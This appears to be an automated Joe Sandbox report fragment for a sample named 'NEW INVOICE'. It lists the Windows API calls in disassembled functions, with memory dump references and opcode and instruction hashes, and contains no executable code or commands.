                                                                                    • GetWindowRect.USER32(?,?), ref: 00438ECC
                                                                                    • PostMessageW.USER32(00000001,?,00000001,?), ref: 00438F7C
                                                                                    • Sleep.KERNEL32(00000000), ref: 00438F84
                                                                                    • PostMessageW.USER32(?,00000202,00000000,?), ref: 00438F95
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?), ref: 00438F9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 2ab6e8217c4101ef9f031d568675ad0bf41e28325206932565347c4090b4e9a4
                                                                                    • Instruction ID: 0163f4fbfa3540aa74b75641586733f0f0ecdd6424bf32d6baecdffd05b1cde8
                                                                                    • Opcode Fuzzy Hash: 2ab6e8217c4101ef9f031d568675ad0bf41e28325206932565347c4090b4e9a4
                                                                                    • Instruction Fuzzy Hash: 9B31C032104305AFD300CF68CA88A6BB7E5EBC8314F555A2DF9A497291DB74EC06CB56
                                                                                    APIs
                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(00A71BE8,000000F1,00000000,00000000), ref: 004414C6
                                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(00A71BE8,000000F1,00000001,00000000), ref: 004414F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                    • String ID:
                                                                                    • API String ID: 142311417-0
                                                                                    • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                    • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                    • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                    • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0044955A
                                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                    • _wcslen.LIBCMT ref: 004495C1
                                                                                    • _wcslen.LIBCMT ref: 004495CE
                                                                                    • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                    • String ID:
                                                                                    • API String ID: 1843234404-0
                                                                                    • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                    • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                    • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                    • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                    • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                    • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                    • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00445721
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                    • _wcslen.LIBCMT ref: 004457A3
                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 3087257052-0
                                                                                    • Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                                    • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                    • Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                                    • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                    • GetForegroundWindow.USER32 ref: 00459E07
                                                                                    • GetDC.USER32(00000000), ref: 00459E44
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                    • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                    • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                    • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                    APIs
                                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                    • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                    • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 245547762-0
                                                                                    • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                    • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                    • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                    • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                    • BeginPath.GDI32(?), ref: 004471B7
                                                                                    • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                                    • String ID:
                                                                                    • API String ID: 2338827641-0
                                                                                    • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                    • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                    • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                    • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                    • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                    • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                    • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                    APIs
                                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                    • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                    • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyIcon
                                                                                    • String ID:
                                                                                    • API String ID: 3419509030-0
                                                                                    • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                    • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                    • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                    • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 004175AE
                                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                    • __amsg_exit.LIBCMT ref: 004175CE
                                                                                    • __lock.LIBCMT ref: 004175DE
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                    • InterlockedIncrement.KERNEL32(00A72D00), ref: 00417626
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                    • String ID:
                                                                                    • API String ID: 4271482742-0
                                                                                    • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                    • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                    • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                    • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                    • String ID:
                                                                                    • API String ID: 4023252218-0
                                                                                    • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                    • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                    • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                    • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                    • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                    • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                    • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                    • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                    • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                    • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                    • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1489400265-0
                                                                                    • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                    • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                    • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                    • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                    APIs
                                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 1042038666-0
                                                                                    • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                    • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                    • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                    • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
